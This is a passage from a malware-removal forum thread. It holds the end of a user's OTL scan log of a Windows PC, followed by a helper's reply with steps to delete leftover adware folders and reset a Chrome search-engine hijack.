[2013/12/27 11:11:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Git
[2013/12/27 11:10:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Git
[2013/12/27 11:08:22 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Desktop\SkyUI_stuff
[2013/12/27 11:05:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TortoiseGit
[2013/12/27 11:05:21 | 000,000,000 | ---D | C] -- C:\Program Files\TortoiseGit
[2013/12/27 11:01:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashDevelop
[2013/12/27 11:00:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\FlashDevelop
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/01/13 05:36:33 | 000,025,640 | ---- | M] (Windows ® Server 2003 DDK provider) -- C:\Windows\gdrv.sys
[2014/01/13 05:36:28 | 000,000,376 | -H-- | M] () -- C:\Windows\tasks\MagniPicUpdaterTask{1808030E-38EA-43D5-A427-B34BA55CD23C}.job
[2014/01/13 05:36:22 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/01/13 05:36:16 | 3206,471,680 | -HS- | M] () -- C:\hiberfil.sys
[2014/01/13 05:17:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/01/12 11:37:28 | 000,026,512 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/01/12 11:37:28 | 000,026,512 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/01/12 09:50:14 | 000,692,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/01/12 09:50:14 | 000,071,048 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014/01/12 09:43:10 | 000,096,168 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2014/01/12 09:43:09 | 000,264,616 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe
[2014/01/12 09:43:09 | 000,175,016 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe
[2014/01/12 09:43:09 | 000,174,504 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe
[2014/01/12 09:26:02 | 000,312,744 | ---- | M] (Oracle Corporation) -- C:\Windows\SysNative\javaws.exe
[2014/01/12 09:26:02 | 000,189,352 | ---- | M] (Oracle Corporation) -- C:\Windows\SysNative\javaw.exe
[2014/01/12 09:26:02 | 000,189,352 | ---- | M] (Oracle Corporation) -- C:\Windows\SysNative\java.exe
[2014/01/12 09:26:02 | 000,108,968 | ---- | M] (Oracle Corporation) -- C:\Windows\SysNative\WindowsAccessBridge-64.dll
[2014/01/11 16:59:08 | 000,065,328 | ---- | M] () -- C:\Users\Wesley\Desktop\SceneSS.png
[2014/01/11 12:13:38 | 000,011,717 | ---- | M] () -- C:\Users\Wesley\Documents\Public_Executions_Setup.odt
[2014/01/10 10:32:46 | 000,007,627 | ---- | M] () -- C:\Users\Wesley\AppData\Local\Resmon.ResmonCfg
[2014/01/07 17:21:04 | 000,000,934 | ---- | M] () -- C:\Users\Public\Desktop\Nexus Mod Manager.lnk
[2014/01/07 09:58:03 | 000,877,058 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/01/07 09:58:03 | 000,729,420 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/01/07 09:58:03 | 000,147,176 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/01/03 16:06:27 | 001,036,305 | ---- | M] (Thisisu) -- C:\Users\Wesley\Desktop\JRT.exe
[2014/01/03 15:49:26 | 001,233,962 | ---- | M] () -- C:\Users\Wesley\Desktop\AdwCleaner.exe
[2014/01/03 15:40:42 | 002,219,728 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/01/03 15:30:50 | 000,175,616 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\msclmd.dll
[2014/01/03 15:30:50 | 000,152,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\msclmd.dll
[2014/01/03 07:49:28 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2014/01/03 07:47:22 | 000,000,559 | ---- | M] () -- C:\Users\Wesley\Desktop\MBR.zip
[2014/01/03 07:45:59 | 000,000,512 | ---- | M] () -- C:\Users\Wesley\Desktop\MBR.dat
[2014/01/02 23:21:44 | 004,745,728 | ---- | M] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2014/01/02 23:08:40 | 000,987,410 | ---- | M] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
[2014/01/02 13:07:15 | 000,020,749 | ---- | M] () -- C:\Users\Wesley\Documents\Public_Executions_Tutorial.odt
[2014/01/02 07:58:31 | 000,388,608 | ---- | M] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/12/27 11:50:54 | 000,000,090 | ---- | M] () -- C:\Users\Wesley\mm.cfg
[2013/12/27 11:22:21 | 000,002,010 | ---- | M] () -- C:\Users\Wesley\Documents\SelectedItemMonitor.as2proj
[2013/12/27 06:34:31 | 000,005,756 | ---- | M] () -- C:\Users\Wesley\Documents\Database.kdb
[2013/12/26 08:48:29 | 000,294,402 | ---- | M] () -- C:\Users\Wesley\Desktop\ScreenShot472.jpg
[2013/12/26 08:48:19 | 000,285,855 | ---- | M] () -- C:\Users\Wesley\Desktop\ScreenShot471.jpg
[2013/12/25 11:09:45 | 000,014,582 | ---- | M] () -- C:\Users\Wesley\Desktop\animationtest.nif
[2013/12/25 11:09:45 | 000,000,118 | ---- | M] () -- C:\Users\Wesley\Desktop\animationtest.kf
[2013/12/25 08:14:22 | 000,008,878 | ---- | M] () -- C:\Users\Wesley\Desktop\watertestorb.nif
[2013/12/25 08:11:59 | 000,006,192 | ---- | M] () -- C:\Users\Wesley\AppData\Local\recently-used.xbel
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/01/11 16:59:08 | 000,065,328 | ---- | C] () -- C:\Users\Wesley\Desktop\SceneSS.png
[2014/01/11 12:13:35 | 000,011,717 | ---- | C] () -- C:\Users\Wesley\Documents\Public_Executions_Setup.odt
[2014/01/03 15:49:21 | 001,233,962 | ---- | C] () -- C:\Users\Wesley\Desktop\AdwCleaner.exe
[2014/01/03 07:47:22 | 000,000,559 | ---- | C] () -- C:\Users\Wesley\Desktop\MBR.zip
[2014/01/03 07:45:59 | 000,000,512 | ---- | C] () -- C:\Users\Wesley\Desktop\MBR.dat
[2014/01/02 23:08:36 | 000,987,410 | ---- | C] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
[2014/01/02 13:07:13 | 000,020,749 | ---- | C] () -- C:\Users\Wesley\Documents\Public_Executions_Tutorial.odt
[2013/12/27 11:20:16 | 000,002,010 | ---- | C] () -- C:\Users\Wesley\Documents\SelectedItemMonitor.as2proj
[2013/12/27 11:13:14 | 000,000,090 | ---- | C] () -- C:\Users\Wesley\mm.cfg
[2013/12/26 08:48:29 | 000,294,402 | ---- | C] () -- C:\Users\Wesley\Desktop\ScreenShot472.jpg
[2013/12/26 08:48:19 | 000,285,855 | ---- | C] () -- C:\Users\Wesley\Desktop\ScreenShot471.jpg
[2013/12/25 11:09:45 | 000,000,118 | ---- | C] () -- C:\Users\Wesley\Desktop\animationtest.kf
[2013/12/25 08:14:22 | 000,008,878 | ---- | C] () -- C:\Users\Wesley\Desktop\watertestorb.nif
[2013/12/25 08:11:59 | 000,006,192 | ---- | C] () -- C:\Users\Wesley\AppData\Local\recently-used.xbel
[2013/12/25 06:19:47 | 000,014,582 | ---- | C] () -- C:\Users\Wesley\Desktop\animationtest.nif
[2013/08/09 12:11:40 | 000,000,089 | ---- | C] () -- C:\Users\Wesley\.gtk-bookmarks
[2013/03/08 08:41:00 | 000,000,600 | ---- | C] () -- C:\Users\Wesley\AppData\Local\PUTTY.RND
[2012/11/07 10:42:16 | 000,444,283 | ---- | C] () -- C:\Program Files\Common Files\WinPcapNmap.exe
[2012/03/31 01:16:37 | 000,000,600 | ---- | C] () -- C:\Users\Wesley\AppData\Roaming\winscp.rnd
[2011/10/29 09:30:13 | 000,030,720 | ---- | C] () -- C:\Users\Wesley\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/07/08 06:43:10 | 000,009,707 | ---- | C] () -- C:\Users\Wesley\AppData\Roaming\C186.2A3
[2011/01/01 04:02:54 | 000,007,627 | ---- | C] () -- C:\Users\Wesley\AppData\Local\Resmon.ResmonCfg
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2010/11/20 08:27:25 | 014,174,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2010/11/20 07:21:19 | 012,872,192 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 07:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== Files - Unicode (All) ==========
[2011/11/21 07:48:07 | 000,000,650 | ---- | M] ()(C:\Users\Wesley\AppData\Local\PMB Fik?s) -- C:\Users\Wesley\AppData\Local\PMB Fik聥s
[2011/11/21 07:48:07 | 000,000,650 | ---- | C] ()(C:\Users\Wesley\AppData\Local\PMB Fik?s) -- C:\Users\Wesley\AppData\Local\PMB Fik聥s

< End of report >



#15 OCD

OCD

    SuperHelper

  • Malware Team
  • 5,574 posts

Posted 13 January 2014 - 02:35 PM

Hi Midnight Sky,

bullseye_zpse9eaf36e.gif Delete a File/Folder

Using Windows Explorer (Windows Key + E), locate the following files/folders, and DELETE them (if still present):
  • C:\ProgramData\DeAlEoxipRRESs <-- delete the folder, if present
  • C:\ProgramData\FuanDEals <-- delete the folder, if present
Exit Explorer

=========================

The following Chrome settings are still showing in the OTL log:

CHR - default_search_provider: search_url = http://searchou.com/...0000050b60df2d6
CHR - homepage: http://searchou.com/...0000050b60df2d6

Did you follow the steps to reset these back in post # 6 ?

=========================
OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days








If you are satisfied with the help you have received, please consider making a donation.

Related Topics



0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users